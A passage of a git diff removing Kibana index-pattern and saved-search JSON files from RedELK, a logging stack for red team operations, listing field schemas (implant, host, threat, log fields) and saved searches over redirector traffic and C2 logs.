true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.geo.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.geo.region_iso_code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.geo.region_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.hostname", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "host.ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "host.ip_ext", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip" - ], - "name": "host.ip_int", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.mac", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.os.build", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.os.codename", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.os.family", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.os.full", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "host.os.full.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "host.os.full" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.os.kernel", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.os.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "host.os.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "host.os.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.os.platform", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.os.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "host.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "implant.arch", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "implant.checkin", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "implant.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "implant.input", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "implant.link_mode", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "implant.linked", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "implant.log_file", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "implant.output", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "implant.parent_id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "implant.sleep", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "implant.task", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "implant.url", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "infra.attack_scenario", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "infra.log_type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "input.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "ioc.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.file.path", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.flags", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.level", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.logger", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "log.offset", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "log.origin.file.line", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.origin.file.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.origin.function", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.original", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.source.address", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "log.syslog.facility.code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.syslog.facility.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "log.syslog.priority", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "log.syslog.severity.code", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "log.syslog.severity.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "message", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "process.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "process.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "process.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "process.pid", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "screenshot.full", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "screenshot.thumb", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "service.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "service.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tags", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "threat.framework", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "threat.tactic.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "threat.tactic.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "threat.tactic.reference", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "threat.technique.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "threat.technique.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "threat.technique.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "threat.technique.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "threat.technique.reference", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user.email", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user.hash", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "user.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "user.name" - } - }, - "type": "string" - } - ], - "title": "implantsdb" - }, - "coreMigrationVersion": "7.16.3", - "id": "implantsdb", - "migrationVersion": { - "index-pattern": "7.11.0" - }, - "references": [], - "sort": [ - 1642171862691, - 16 - ], - "type": "index-pattern", - "version": "1" - } -] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_iplist.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_iplist.json deleted file mode 100644 index 134edd38..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_iplist.json +++ /dev/null @@ -1,146 +0,0 @@ -[ - { - "attributes": { - "fields": [ - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "@timestamp", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_id" - ], - "name": "_id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_index" - ], - "name": "_index", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "name": "_score", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "number" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "_source" - ], - "name": "_source", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "_source" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_type" - ], - "name": "_type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "date_modified", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 1, - "esTypes": [ - "ip" - ], - "name": "ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "ip" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "last_updated", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "list", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 1, - "esTypes": [ - "keyword" - ], - "name": "source", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - } - ], - "timeFieldName": "@timestamp", - "title": "iplist-*" - }, - "id": "789bb360-2ab1-11eb-bc47-53169c986c81", - "migrationVersion": { - "index-pattern": "7.6.0" - }, - "references": [], - "type": "index-pattern", - "version": "1" - } -] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redelk.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redelk.json deleted file mode 100644 index 361fd12c..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redelk.json +++ /dev/null @@ -1,222 +0,0 @@ -[ - { - "attributes": { - "fields": [ - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "@timestamp", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_id" - ], - "name": "_id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_index" - ], - "name": "_index", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "name": "_score", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "number" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "_source" - ], - "name": "_source", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "_source" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_type" - ], - "name": "_type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "iplist.comments", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "ip_range" - ], - "name": "iplist.ip", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "unknown" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "iplist.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "iplist.source", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "module.last_run.count", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "module.last_run.message", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "module.last_run.status", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "module.last_run.timestamp", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "module.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "module.type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "type", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - } - ], - "title": "redelk-*" - }, - "coreMigrationVersion": "7.16.3", - "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", - "migrationVersion": { - "index-pattern": "7.11.0" - }, - "references": [], - "sort": [ - 1642171866710, - 20 - ], - "type": "index-pattern", - "version": "1" - } -] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redirtraffic.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redirtraffic.json deleted file mode 100644 index 8cdcaafd..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_redirtraffic.json +++ /dev/null @@ -1,25 +0,0 @@ -[ - { - "attributes": { - "fieldAttrs": "{\"tags\":{\"count\":1}}", - "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"greynoise.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.last_updated\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.query_timestamp\":{\"id\":\"string\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}}}", - "fields": [], - "runtimeFieldMap": "{}", - "timeFieldName": "@timestamp", - "title": "redirtraffic-*", - "typeMeta": "{}" - }, - "coreMigrationVersion": "7.16.3", - "id": "redirtraffic", - "migrationVersion": { - "index-pattern": "7.11.0" - }, - "references": [], - "sort": [ - 1642171868723, - 243 - ], - "type": "index-pattern", - "version": "1" - } -] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_rtops.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_rtops.json deleted file mode 100644 index 0386f52d..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_rtops.json +++ /dev/null @@ -1,25 +0,0 @@ -[ - { - "attributes": { - "fieldAttrs": "{\"c2.program\":{\"count\":1}}", - "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"event.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Event URL\"}},\"file.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"/\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"File download\"}},\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}},\"keystrokes.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full keystrokes\"}},\"screenshot.full\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full screenshot\"}},\"screenshot.thumb\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"type\":\"img\",\"urlTemplate\":\"/../..{{rawValue}}\"}},\"implant.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", - "fields": [], - "runtimeFieldMap": "{}", - "timeFieldName": "@timestamp", - "title": "rtops-*", - "typeMeta": "{}" - }, - "coreMigrationVersion": "7.16.3", - "id": "rtops", - "migrationVersion": { - "index-pattern": "7.11.0" - }, - "references": [], - "sort": [ - 1642171870762, - 242 - ], - "type": "index-pattern", - "version": "1" - } -] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_search.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_search.json deleted file mode 100644 index 31cf5e1f..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_search.json +++ /dev/null @@ -1,1188 +0,0 @@ -[ - { - "attributes": { - "columns": [ - "infra.attack_scenario", - "agent.hostname", - "redir.backend.name", - "source.ip", - "source.domain", - "source.as.organization.name", - "http.request.body.content" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "lucene", - "query": "" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "RedELK - _Redirector Traffic", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "redirtraffic", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171874859, - 198 - ], - "type": "search", - "version": "1" - }, - { - "attributes": { - "columns": [ - "infra.attack_scenario", - "user.name", - "host.name", - "ioc.type", - "file.hash.md5", - "file.name", - "file.size", - "ioc.domain" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "c2.log.type", - "negate": false, - "params": { - "query": "ioc" - }, - "type": "phrase" - }, - "query": { - "match": { - "c2.log.type": { - "query": "ioc", - "type": "phrase" - } - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "lucene", - "query": "tags:alarm_*" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "RedELK - C2 IOCs - Alarmed", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - } - ], - "sort": [ - 1642171874859, - 201 - ], - "type": "search", - "version": "1" - }, - { - "attributes": { - "columns": [ - "infra.attack_scenario", - "user.name", - "host.name", - "c2.message" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "c2.log.type", - "negate": true, - "params": { - "query": "events" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "c2.log.type": "events" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "key": "c2.log.type", - "negate": true, - "params": { - "query": "events_joinleave" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "c2.log.type": "events_joinleave" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", - "key": "c2.log.type", - "negate": true, - "params": { - "query": "credentials" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "c2.log.type": "credentials" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", - "key": "c2.log.type", - "negate": true, - "params": { - "query": "keystrokes" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "c2.log.type": "keystrokes" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index", - "key": "c2.log.type", - "negate": true, - "params": { - "query": "downloads" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "c2.log.type": "downloads" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index", - "key": "c2.log.type", - "negate": true, - "params": { - "query": "screenshots" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "c2.log.type": "screenshots" - } - } - } - ], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "RedELK - _Red Team Operations", - "version": 1 - }, - "coreMigrationVersion": "7.16.3", - "id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", - "migrationVersion": { - "search": "7.9.3" - }, - "references": [ - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", - "type": "index-pattern" - }, - { - "id": "rtops", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", - "type": "index-pattern" - }, - { - 